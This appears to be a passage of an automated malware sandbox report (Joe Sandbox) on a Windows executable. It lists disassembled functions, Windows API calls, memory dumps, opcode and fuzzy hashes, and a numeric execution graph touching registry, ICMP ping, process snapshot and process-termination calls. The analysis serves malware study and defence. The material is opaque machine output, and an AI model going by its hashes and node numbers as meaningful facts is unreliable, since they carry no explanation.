                                                    • Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8
                                                    APIs
                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E42
                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405E52
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CharPrevlstrlen
                                                    • String ID: C:\Users\user\Desktop
                                                    • API String ID: 2709904686-3976562730
                                                    • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                    • Instruction ID: eba18341e72c17137544591cfc51a7e4cac6184970473274e9d14fc4341c5a90
                                                    • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                    • Instruction Fuzzy Hash: 29D0A7F3400A30DAC3127708EC00D9F77ACEF16700746443AE580A7165D7785D818AEC
                                                    APIs
                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
                                                    • CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
                                                    • lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                    • String ID:
                                                    • API String ID: 190613189-0
                                                    • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                    • Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
                                                    • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                    • Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8

                                                    Execution Graph

                                                    Execution Coverage:4.4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:1.9%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:89
                                                    execution_graph 97881 777357 97882 7778f5 97881->97882 97883 777360 97881->97883 97891 776fdb Mailbox 97882->97891 97916 7c87f9 59 API calls _memmove 97882->97916 97883->97882 97892 774d37 97883->97892 97886 77739b 97910 781680 97886->97910 97889 7af91b 97917 781c9c 97889->97917 97893 774d51 97892->97893 97894 774d4b 97892->97894 97895 7adb28 __i64tow 97893->97895 97896 774d99 97893->97896 97897 774d57 __itow 97893->97897 97901 7ada2f 97893->97901 97894->97882 97894->97886 97935 7938c8 83 API calls 3 library calls 97896->97935 97921 790fe6 97897->97921 97903 790fe6 Mailbox 59 API calls 97901->97903 97905 7adaa7 Mailbox _wcscpy 97901->97905 97902 774d71 97902->97894 97931 781a36 97902->97931 97906 7ada74 97903->97906 97936 7938c8 83 API calls 3 library calls 97905->97936 97907 790fe6 Mailbox 59 API calls 97906->97907 97908 7ada9a 97907->97908 97908->97905 97909 781a36 59 API calls 97908->97909 97909->97905 97911 781692 97910->97911 97915 7816ba _memmove 97910->97915 97912 790fe6 Mailbox 59 API calls 97911->97912 97911->97915 97914 78176f _memmove 97912->97914 97913 790fe6 Mailbox 59 API calls 97913->97914 97914->97913 97915->97891 97916->97889 97918 781caf 97917->97918 97919 781ca7 97917->97919 97918->97891 97971 781bcc 97919->97971 97924 790fee 97921->97924 97923 791008 97923->97902 97924->97923 97926 79100c std::exception::exception 97924->97926 97937 79593c 97924->97937 97954 7935d1 DecodePointer 97924->97954 97955 7987cb RaiseException 97926->97955 97928 791036 97956 798701 58 API calls _free 97928->97956 97930 791048 97930->97902 97932 781a45 __wsetenvp _memmove 97931->97932 97933 790fe6 Mailbox 59 API calls 97932->97933 97934 781a83 97933->97934 97934->97894 97935->97897 97936->97895 97938 7959b7 97937->97938 97947 795948 97937->97947 97965 7935d1 DecodePointer 97938->97965 97940 7959bd 97966 798d58 58 API calls __getptd_noexit 97940->97966 97943 79597b RtlAllocateHeap 97944 7959af 97943->97944 97943->97947 97944->97924 97946 7959a3 97963 798d58 58 API calls __getptd_noexit 97946->97963 97947->97943 97947->97946 97951 7959a1 97947->97951 97952 795953 97947->97952 97962 7935d1 DecodePointer 97947->97962 97964 798d58 58 API calls __getptd_noexit 97951->97964 97952->97947 97957 79a39b 58 API calls 2 library calls 97952->97957 97958 79a3f8 58 API calls 7 library calls 97952->97958 97959 7932cf 97952->97959 97954->97924 97955->97928 97956->97930 97957->97952 97958->97952 97967 79329b GetModuleHandleExW 97959->97967 97962->97947 97963->97951 97964->97944 97965->97940 97966->97944 97968 7932cb ExitProcess 97967->97968 97969 7932b4 GetProcAddress 97967->97969 97969->97968 97970 7932c6 97969->97970 97970->97968 97972 781bef _memmove 97971->97972 97973 781bdc 97971->97973 97972->97918 97973->97972 97974 790fe6 Mailbox 59 API calls 97973->97974 97974->97972 97975 771016 97980 785ce7 97975->97980 97981 790fe6 Mailbox 59 API calls 97980->97981 97982 785cef 97981->97982 97983 77101b 97982->97983 97990 785f39 97982->97990 97987 792f70 97983->97987 98052 792e74 97987->98052 97989 771025 97991 785f42 97990->97991 97992 785cfb 97990->97992 97993 792f70 __cinit 67 API calls 97991->97993 97994 785d13 97992->97994 97993->97992 98018 781207 97994->98018 97998 785d6e 98005 785d9b 97998->98005 98036 781981 97998->98036 98000 785d8f 98040 78133d 98000->98040 98002 785e00 GetCurrentProcess IsWow64Process 98003 785e19 98002->98003 98006 785e98 GetSystemInfo 98003->98006 98007 785e2f 98003->98007 98004 7c1098 98005->98002 98005->98004 98008 785e65 98006->98008 98032 7855f0 98007->98032 98008->97983 98011 785e8c GetSystemInfo 98014 785e56 98011->98014 98012 785e41 98013 7855f0 2 API calls 98012->98013 98015 785e49 GetNativeSystemInfo 98013->98015 98014->98008 98016 785e5c FreeLibrary 98014->98016 98015->98014 98016->98008 98019 790fe6 Mailbox 59 API calls 98018->98019 98020 781228 98019->98020 98021 790fe6 Mailbox 59 API calls 98020->98021 98022 781236 GetVersionExW 98021->98022 98023 781821 98022->98023 98024 78189a 98023->98024 98026 78182d __wsetenvp 98023->98026 98025 781981 59 API calls 98024->98025 98031 78184b _memmove 98025->98031 98027 781868 98026->98027 98028 781843 98026->98028 98045 781c7e 98027->98045 98044 781b7c 59 API calls Mailbox 98028->98044 98031->97998 98033 785619 98032->98033 98034 7855f9 LoadLibraryA 98032->98034 98033->98011 98033->98012 98034->98033 98035 78560a GetProcAddress 98034->98035 98035->98033 98037 781998 _memmove 98036->98037 98038 78198f 98036->98038 98037->98000 98038->98037 98048 781aa4 98038->98048 98041 78134b 98040->98041 98042 781981 59 API calls 98041->98042 98043 78135b 98042->98043 98043->98005 98044->98031 98046 790fe6 Mailbox 59 API calls 98045->98046 98047 781c88 98046->98047 98047->98031 98049 781ab7 98048->98049 98051 781ab4 _memmove 98048->98051 98050 790fe6 Mailbox 59 API calls 98049->98050 98050->98051 98051->98037 98053 792e80 __write 98052->98053 98060 793447 98053->98060 98059 792ea7 __write 98059->97989 98077 799e3b 98060->98077 98062 792e89 98063 792eb8 DecodePointer DecodePointer 98062->98063 98064 792ee5 98063->98064 98065 792e95 98063->98065 98064->98065 98122 7989d4 59 API calls __write 98064->98122 98074 792eb2 98065->98074 98067 792f48 EncodePointer EncodePointer 98067->98065 98068 792f1c 98068->98065 98072 792f36 EncodePointer 98068->98072 98124 798a94 61 API calls __realloc_crt 98068->98124 98069 792ef7 98069->98067 98069->98068 98123 798a94 61 API calls __realloc_crt 98069->98123 98072->98067 98073 792f30 98073->98065 98073->98072 98125 793450 98074->98125 98078 799e4c 98077->98078 98079 799e5f EnterCriticalSection 98077->98079 98084 799ec3 98078->98084 98079->98062 98081 799e52 98081->98079 98108 7932e5 58 API calls 3 library calls 98081->98108 98085 799ecf __write 98084->98085 98086 799ed8 98085->98086 98087 799ef0 98085->98087 98109 79a39b 58 API calls 2 library calls 98086->98109 98099 799f11 __write 98087->98099 98111 798a4d 58 API calls 2 library calls 98087->98111 98090 799edd 98110 79a3f8 58 API calls 7 library calls 98090->98110 98091 799f05 98093 799f1b 98091->98093 98094 799f0c 98091->98094 98097 799e3b __lock 58 API calls 98093->98097 98112 798d58 58 API calls __getptd_noexit 98094->98112 98095 799ee4 98098 7932cf __mtinitlocknum 3 API calls 98095->98098 98100 799f22 98097->98100 98101 799eee 98098->98101 98099->98081 98102 799f2f 98100->98102 98103 799f47 98100->98103 98101->98087 98113 79a05b InitializeCriticalSectionAndSpinCount 98102->98113 98114 792f85 98103->98114 98106 799f3b 98120 799f63 LeaveCriticalSection _doexit 98106->98120 98109->98090 98110->98095 98111->98091 98112->98099 98113->98106 98115 792fb7 _free 98114->98115 98116 792f8e RtlFreeHeap 98114->98116 98115->98106 98116->98115 98117 792fa3 98116->98117 98121 798d58 58 API calls __getptd_noexit 98117->98121 98119 792fa9 GetLastError 98119->98115 98120->98099 98121->98119 98122->98069 98123->98068 98124->98073 98128 799fa5 LeaveCriticalSection 98125->98128 98127 792eb7 98127->98059 98128->98127 98129 774e96 98130 790fe6 Mailbox 59 API calls 98129->98130 98131 774e9d 98130->98131 98132 771055 98137 772a19 98132->98137 98135 792f70 __cinit 67 API calls 98136 771064 98135->98136 98138 781207 59 API calls 98137->98138 98139 772a87 98138->98139 98144 771256 98139->98144 98142 772b24 98143 77105a 98142->98143 98147 7713f8 59 API calls 2 library calls 98142->98147 98143->98135 98148 771284 98144->98148 98147->98142 98149 771291 98148->98149 98151 771275 98148->98151 98150 771298 RegOpenKeyExW 98149->98150 98149->98151 98150->98151 98152 7712b2 RegQueryValueExW 98150->98152 98151->98142 98153 7712d3 98152->98153 98154 7712e8 RegCloseKey 98152->98154 98153->98154 98154->98151 98155 775ff5 98178 775ede Mailbox _memmove 98155->98178 98156 790fe6 59 API calls Mailbox 98156->98178 98157 776a9b 98395 77a9de 278 API calls 98157->98395 98160 7aeff9 98161 775190 Mailbox 59 API calls 98160->98161 98164 7aefeb 98161->98164 98162 7af007 98407 7da48d 89 API calls 4 library calls 98162->98407 98212 775569 Mailbox 98164->98212 98406 7c6cf1 59 API calls Mailbox 98164->98406 98167 7760e5 98168 7ae137 98167->98168 98179 7763bd Mailbox 98167->98179 98180 776abc 98167->98180 98197 776152 Mailbox 98167->98197 98168->98179 98396 7c7aad 59 API calls 98168->98396 98169 781c9c 59 API calls 98169->98178 98171 790fe6 Mailbox 59 API calls 98175 7763d1 98171->98175 98172 781a36 59 API calls 98172->98178 98177 7763de 98175->98177 98175->98180 98181 776413 98177->98181 98182 7ae172 98177->98182 98178->98156 98178->98157 98178->98160 98178->98162 98178->98167 98178->98169 98178->98172 98178->98180 98178->98212 98240 7753b0 98178->98240 98345 7ec355 98178->98345 98391 77523c 98178->98391 98399 7d7f11 59 API calls Mailbox 98178->98399 98400 7c6cf1 59 API calls Mailbox 98178->98400 98179->98171 98185 776426 98179->98185 98405 7da48d 89 API calls 4 library calls 98180->98405 98181->98185 98211 775447 Mailbox 98181->98211 98397 7ec87c 85 API calls 2 library calls 98182->98397 98398 7ec9c9 95 API calls Mailbox 98185->98398 98188 7ae19d 98188->98188 98190 7ae691 98402 7da48d 89 API calls 4 library calls 98190->98402 98191 7af165 98409 7da48d 89 API calls 4 library calls 98191->98409 98193 7769fa 98202 781c9c 59 API calls 98193->98202 98196 790fe6 59 API calls Mailbox 98196->98211 98197->98164 98197->98180 98201 7ae2e9 VariantClear 98197->98201 98197->98212 98268 7e5e1d 98197->98268 98293 7ee60c 98197->98293 98296 7e27a9 98197->98296 98315 77cfd7 98197->98315 98334 7eebba 98197->98334 98340 7ef1b2 98197->98340 98386 775190 98197->98386 98401 7c7aad 59 API calls 98197->98401 98198 7ae6a0 98199 7aea9a 98204 781c9c 59 API calls 98199->98204 98200 7769ff 98200->98190 98200->98191 98201->98197 98202->98212 98204->98212 98205 781c9c 59 API calls 98205->98211 98206 781207 59 API calls 98206->98211 98208 7aeb67 98208->98212 98403 7c7aad 59 API calls 98208->98403 98209 7c7aad 59 API calls 98209->98211 98211->98190 98211->98193 98211->98196 98211->98199 98211->98200 98211->98205 98211->98206 98211->98208 98211->98209 98211->98212 98213 792f70 67 API calls __cinit 98211->98213 98214 7aef28 98211->98214 98216 775a1a 98211->98216 98223 776e30 98211->98223 98385 777e50 278 API calls 2 library calls 98211->98385 98213->98211 98404 7da48d 89 API calls 4 library calls 98214->98404 98408 7da48d 89 API calls 4 library calls 98216->98408 98224 776e4a 98223->98224 98226 776ff7 98223->98226 98225 7774d0 98224->98225 98224->98226 98228 776f2c 98224->98228 98235 776fdb 98224->98235 98225->98235 98414 7749e0 59 API calls wcstoxq 98225->98414 98226->98225 98232 776fbb Mailbox 98226->98232 98234 777076 98226->98234 98226->98235 98231 776f68 98228->98231 98228->98234 98228->98235 98230 7afc1e 98236 7afc30 98230->98236 98412 793f69 59 API calls __wtof_l 98230->98412 98231->98232 98231->98235 98237 7afa71 98231->98237 98232->98230 98232->98235 98413 7741c4 59 API calls Mailbox 98232->98413 98234->98230 98234->98232 98234->98235 98411 7c7aad 59 API calls 98234->98411 98235->98211 98236->98211 98237->98235 98410 793f69 59 API calls __wtof_l 98237->98410 98241 7753cf 98240->98241 98264 7753fd Mailbox 98240->98264 98242 790fe6 Mailbox 59 API calls 98241->98242 98242->98264 98243 7769fa 98244 781c9c 59 API calls 98243->98244 98263 775569 Mailbox 98244->98263 98245 7769ff 98247 7ae691 98245->98247 98248 7af165 98245->98248 98246 781207 59 API calls 98246->98264 98416 7da48d 89 API calls 4 library calls 98247->98416 98420 7da48d 89 API calls 4 library calls 98248->98420 98249 776e30 60 API calls 98249->98264 98252 790fe6 59 API calls Mailbox 98252->98264 98253 792f70 67 API calls __cinit 98253->98264 98254 7ae6a0 98254->98178 98255 7aea9a 98257 781c9c 59 API calls 98255->98257 98257->98263 98258 781c9c 59 API calls 98258->98264 98260 7c7aad 59 API calls 98260->98264 98261 7aeb67 98261->98263 98417 7c7aad 59 API calls 98261->98417 98263->98178 98264->98243 98264->98245 98264->98246 98264->98247 98264->98249 98264->98252 98264->98253 98264->98255 98264->98258 98264->98260 98264->98261 98264->98263 98265 7aef28 98264->98265 98267 775a1a 98264->98267 98415 777e50 278 API calls 2 library calls 98264->98415 98418 7da48d 89 API calls 4 library calls 98265->98418 98419 7da48d 89 API calls 4 library calls 98267->98419 98269 7e5e46 98268->98269 98270 7e5e74 WSAStartup 98269->98270 98434 77502b 59 API calls 98269->98434 98271 7e5e9d 98270->98271 98282 7e5e88 Mailbox 98270->98282 98421 7840cd 98271->98421 98274 7e5e61 98274->98270 98435 77502b 59 API calls 98274->98435 98276 774d37 84 API calls 98278 7e5eb2 98276->98278 98426 78402a WideCharToMultiByte 98278->98426 98279 7e5e70 98279->98270 98281 7e5ebf inet_addr gethostbyname 98281->98282 98283 7e5edd IcmpCreateFile 98281->98283 98282->98197 98283->98282 98284 7e5f01 98283->98284 98285 790fe6 Mailbox 59 API calls 98284->98285 98286 7e5f1a 98285->98286 98436 78433f 98286->98436 98289 7e5f34 IcmpSendEcho 98291 7e5f6d 98289->98291 98290 7e5f55 IcmpSendEcho 98290->98291 98292 7e5fd4 IcmpCloseHandle WSACleanup 98291->98292 98292->98282 98441 7ed1c6 98293->98441 98295 7ee61c 98295->98197 98297 7e27ce 98296->98297 98298 7e27c3 98296->98298 98300 774d37 84 API calls 98297->98300 98580 77502b 59 API calls 98298->98580 98301 7e27e0 98300->98301 98575 7e1aa6 98301->98575 98316 774d37 84 API calls 98315->98316 98317 77d001 98316->98317 98581 775278 98317->98581 98319 77d018 98320 77d57b 98319->98320 98325 77d439 Mailbox __wsetenvp 98319->98325 98611 77502b 59 API calls 98319->98611 98320->98197 98324 790c65 62 API calls 98324->98325 98325->98320 98325->98324 98327 774f98 59 API calls 98325->98327 98329 774d37 84 API calls 98325->98329 98330 77502b 59 API calls 98325->98330 98331 781821 59 API calls 98325->98331 98586 79312d 98325->98586 98596 7859d3 98325->98596 98607 785ac3 98325->98607 98612 78162d 98325->98612 98617 78153b 59 API calls 2 library calls 98325->98617 98618 774f3c 59 API calls Mailbox 98325->98618 98327->98325 98329->98325 98330->98325 98331->98325 98338 7eebcd 98334->98338 98335 774d37 84 API calls 98336 7eec0a 98335->98336 98673 7d7ce4 98336->98673 98338->98335 98339 7eebdc 98338->98339 98339->98197 98341 774d37 84 API calls 98340->98341 98342 7ef1cf 98341->98342 98717 7d4148 CreateToolhelp32Snapshot Process32FirstW 98342->98717 98344 7ef1de 98344->98197 98346 7ec39a 98345->98346 98347 7ec380 98345->98347 98829 7ea8fd 98346->98829 98856 7da48d 89 API calls 4 library calls 98347->98856 98351 7753b0 277 API calls 98352 7ec406 98351->98352 98353 7ec498 98352->98353 98356 7ec447 98352->98356 98378 7ec392 Mailbox 98352->98378 98354 7ec4ee 98353->98354 98355 7ec49e 98353->98355 98357 774d37 84 API calls 98354->98357 98354->98378 98857 7d7ed5 59 API calls 98355->98857 98361 7d789a 59 API calls 98356->98361 98359 7ec500 98357->98359 98362 781aa4 59 API calls 98359->98362 98360 7ec4c1 98858 7835b9 59 API calls Mailbox 98360->98858 98364 7ec477 98361->98364 98365 7ec524 CharUpperBuffW 98362->98365 98367 7c6ebc 277 API calls 98364->98367 98368 7ec53e 98365->98368 98366 7ec4c9 Mailbox 98859 77b020 98366->98859 98367->98378 98369 7ec545 98368->98369 98370 7ec591 98368->98370 98836 7d789a 98369->98836 98372 774d37 84 API calls 98370->98372 98373 7ec599 98372->98373 98901 775376 60 API calls 98373->98901 98378->98178 98379 7ec5a3 98379->98378 98380 774d37 84 API calls 98379->98380 98381 7ec5be 98380->98381 98902 7835b9 59 API calls Mailbox 98381->98902 98383 7ec5ce 98384 77b020 277 API calls 98383->98384 98384->98378 98385->98211 98388 77519b 98386->98388 98387 7751d2 98387->98197 98388->98387 99383 7741c4 59 API calls Mailbox 98388->99383 98390 7751fd 98390->98197 98392 77524a 98391->98392 98393 775250 98391->98393 98392->98393 98394 781c9c 59 API calls 98392->98394 98393->98178 98394->98393 98395->98180 98396->98179 98397->98185 98398->98188 98399->98178 98400->98178 98401->98197 98402->98198 98403->98212 98404->98216 98405->98164 98406->98212 98407->98164 98408->98212 98409->98212 98410->98237 98411->98232 98412->98236 98413->98232 98414->98235 98415->98264 98416->98254 98417->98263 98418->98267 98419->98263 98420->98263 98422 790fe6 Mailbox 59 API calls 98421->98422 98423 7840e0 98422->98423 98424 781c7e 59 API calls 98423->98424 98425 7840ed 98424->98425 98425->98276 98427 78404e 98426->98427 98428 784085 98426->98428 98429 790fe6 Mailbox 59 API calls 98427->98429 98440 783f20 59 API calls Mailbox 98428->98440 98431 784055 WideCharToMultiByte 98429->98431 98439 783f79 59 API calls 2 library calls 98431->98439 98433 784077 98433->98281 98434->98274 98435->98279 98437 790fe6 Mailbox 59 API calls 98436->98437 98438 784351 98437->98438 98438->98289 98438->98290 98439->98433 98440->98433 98442 774d37 84 API calls 98441->98442 98443 7ed203 98442->98443 98467 7ed24a Mailbox 98443->98467 98479 7ede8e 98443->98479 98445 7ed4a2 98446 7ed617 98445->98446 98450 7ed4b0 98445->98450 98538 7edfb1 92 API calls Mailbox 98446->98538 98449 7ed626 98449->98450 98452 7ed632 98449->98452 98492 7ed057 98450->98492 98451 774d37 84 API calls 98462 7ed29b Mailbox 98451->98462 98452->98467 98457 7ed4e9 98507 790e38 98457->98507 98460 7ed51c 98512 7747be 98460->98512 98461 7ed503 98536 7da48d 89 API calls 4 library calls 98461->98536 98462->98445 98462->98451 98462->98467 98534 7dfc0d 59 API calls 2 library calls 98462->98534 98535 7ed6c8 61 API calls 2 library calls 98462->98535 98465 7ed50e GetCurrentProcess TerminateProcess 98465->98460 98467->98295 98470 774230 59 API calls 98472 7ed554 98470->98472 98471 7ed68d 98471->98467 98475 7ed6a1 FreeLibrary 98471->98475 98537 7edd32 107 API calls _free 98472->98537 98475->98467 98477 77523c 59 API calls 98478 7ed565 98477->98478 98478->98471 98478->98477 98523 774230 98478->98523 98539 7edd32 107 API calls _free 98478->98539 98480 781aa4 59 API calls 98479->98480 98481 7edea9 CharLowerBuffW 98480->98481 98540 7cf903 98481->98540 98485 781207 59 API calls 98486 7edee2 98485->98486 98547 781462 98486->98547 98488 7edf41 Mailbox 98488->98462 98489 7edef9 98490 781981 59 API calls 98489->98490 98491 7edf05 Mailbox 98490->98491 98491->98488 98560 7ed6c8 61 API calls 2 library calls 98491->98560 98493 7ed072 98492->98493 98497 7ed0c7 98492->98497 98494 790fe6 Mailbox 59 API calls 98493->98494 98495 7ed094 98494->98495 98496 790fe6 Mailbox 59 API calls 98495->98496 98495->98497 98496->98495 98498 7ee139 98497->98498 98499 7ee362 Mailbox 98498->98499 98506 7ee15c _strcat _wcscpy __wsetenvp 98498->98506 98499->98457 98500 77502b 59 API calls 98500->98506 98501 775087 59 API calls 98501->98506 98502 7750d5 59 API calls 98502->98506 98503 774d37 84 API calls 98503->98506 98504 79593c 58 API calls std::exception::_Copy_str 98504->98506 98506->98499 98506->98500 98506->98501 98506->98502 98506->98503 98506->98504 98564 7d5e42 61 API calls 2 library calls 98506->98564 98508 790e4d 98507->98508 98509 790ee5 CreateToolhelp32Snapshot 98508->98509 98510 790eb3 98508->98510 98511 790ed3 FindCloseChangeNotification 98508->98511 98509->98510 98510->98460 98510->98461 98511->98510 98513 7747c6 98512->98513 98514 790fe6 Mailbox 59 API calls 98513->98514 98515 7747d4 98514->98515 98516 7747e0 98515->98516 98565 7746ec 59 API calls Mailbox 98515->98565 98518 774540 98516->98518 98566 774650 98518->98566 98520 77454f 98521 790fe6 Mailbox 59 API calls 98520->98521 98522 7745eb 98520->98522 98521->98522 98522->98470 98522->98478 98524 774242 98523->98524 98527 77424b 98524->98527 98574 7740cb 59 API calls Mailbox 98524->98574 98526 774308 98526->98478 98527->98526 98528 790fe6 Mailbox 59 API calls 98527->98528 98529 77435c 98528->98529 98530 790fe6 Mailbox 59 API calls 98529->98530 98532 77437f 98529->98532 98531 77436c 98530->98531 98531->98532 98533 781a36 59 API calls 98531->98533 98532->98478 98533->98532 98534->98462 98535->98462 98536->98465 98537->98478 98538->98449 98539->98478 98541 7cf92e __wsetenvp 98540->98541 98542 7cf96d 98541->98542 98543 7cf963 98541->98543 98546 7cfa14 98541->98546 98542->98485 98542->98491 98543->98542 98561 7814db 61 API calls 98543->98561 98546->98542 98562 7814db 61 API calls 98546->98562 98548 7814ce 98547->98548 98549 781471 98547->98549 98550 781981 59 API calls 98548->98550 98549->98548 98551 78147c 98549->98551 98557 78149f _memmove 98550->98557 98552 7bf1de 98551->98552 98553 781497 98551->98553 98554 781c7e 59 API calls 98552->98554 98563 781b7c 59 API calls Mailbox 98553->98563 98556 7bf1e8 98554->98556 98558 790fe6 Mailbox 59 API calls 98556->98558 98557->98489 98559 7bf208 98558->98559 98560->98488 98561->98543 98562->98546 98563->98557 98564->98506 98565->98516 98567 774659 Mailbox 98566->98567 98568 7ad6ec 98567->98568 98573 774663 98567->98573 98569 790fe6 Mailbox 59 API calls 98568->98569 98571 7ad6f8 98569->98571 98570 77466a 98570->98520 98571->98571 98572 775190 Mailbox 59 API calls 98572->98573 98573->98570 98573->98572 98574->98527 98576 781a36 59 API calls 98575->98576 98577 7e1ad1 98576->98577 98578 781a36 59 API calls 98577->98578 98579 7e1adc 98578->98579 98580->98297 98582 790fe6 Mailbox 59 API calls 98581->98582 98583 775285 98582->98583 98584 775294 98583->98584 98585 781a36 59 API calls 98583->98585 98584->98319 98585->98584 98587 7931ae 98586->98587 98588 793139 98586->98588 98621 7931c0 60 API calls 3 library calls 98587->98621 98595 79315e 98588->98595 98619 798d58 58 API calls __getptd_noexit 98588->98619 98590 7931bb 98590->98325 98592 793145 98620 798fe6 9 API calls __write 98592->98620 98594 793150 98594->98325 98595->98325 98597 7859fe _memset 98596->98597 98622 785800 98597->98622 98600 785a83 98602 785ab9 Shell_NotifyIconW 98600->98602 98603 785a9d Shell_NotifyIconW 98600->98603 98604 785aab 98602->98604 98603->98604 98626 7856f8 98604->98626 98606 785ab2 98606->98325 98608 785b25 98607->98608 98609 785ad5 _memset 98607->98609 98608->98325 98610 785af4 Shell_NotifyIconW 98609->98610 98610->98608 98611->98325 98613 790fe6 Mailbox 59 API calls 98612->98613 98614 781652 98613->98614 98615 790fe6 Mailbox 59 API calls 98614->98615 98616 781660 98615->98616 98616->98325 98617->98325 98618->98325 98619->98592 98620->98594 98621->98590 98623 78581c 98622->98623 98624 785810 98622->98624 98623->98624 98625 785821 DestroyIcon 98623->98625 98624->98600 98656 7d34dd 62 API calls _W_store_winword 98624->98656 98625->98624 98627 7857fa Mailbox 98626->98627 98628 785715 98626->98628 98627->98606 98629 78162d 59 API calls 98628->98629 98630 785723 98629->98630 98631 7c0c4c LoadStringW 98630->98631 98632 785730 98630->98632 98635 7c0c66 98631->98635 98633 781821 59 API calls 98632->98633 98634 785745 98633->98634 98636 785752 98634->98636 98642 7c0c74 98634->98642 98637 781c9c 59 API calls 98635->98637 98636->98635 98638 785760 98636->98638 98644 785778 _memset _wcscpy 98637->98644 98657 781900 98638->98657 98643 7c0cb7 Mailbox 98642->98643 98642->98644 98645 781207 59 API calls 98642->98645 98667 7938c8 83 API calls 3 library calls 98643->98667 98646 7857e0 Shell_NotifyIconW 98644->98646 98647 7c0c9e 98645->98647 98646->98627 98665 7d0252 60 API calls Mailbox 98647->98665 98650 7c0cd6 98653 781900 59 API calls 98650->98653 98651 7c0ca9 98666 7817e0 59 API calls Mailbox 98651->98666 98654 7c0ce7 98653->98654 98655 781900 59 API calls 98654->98655 98655->98644 98656->98600 98658 781914 98657->98658 98659 7bf534 98657->98659 98668 7818a5 98658->98668 98660 781c7e 59 API calls 98659->98660 98663 7bf53f __wsetenvp _memmove 98660->98663 98662 78191f 98664 7817e0 59 API calls Mailbox 98662->98664 98664->98644 98665->98651 98666->98643 98667->98650 98669 7818b4 __wsetenvp 98668->98669 98670 781c7e 59 API calls 98669->98670 98671 7818c5 _memmove 98669->98671 98672 7bf4f1 _memmove 98670->98672 98671->98662 98674 7d7cf1 98673->98674 98675 790fe6 Mailbox 59 API calls 98674->98675 98676 7d7cf8 98675->98676 98679 7d6135 98676->98679 98678 7d7d3b Mailbox 98678->98339 98680 781aa4 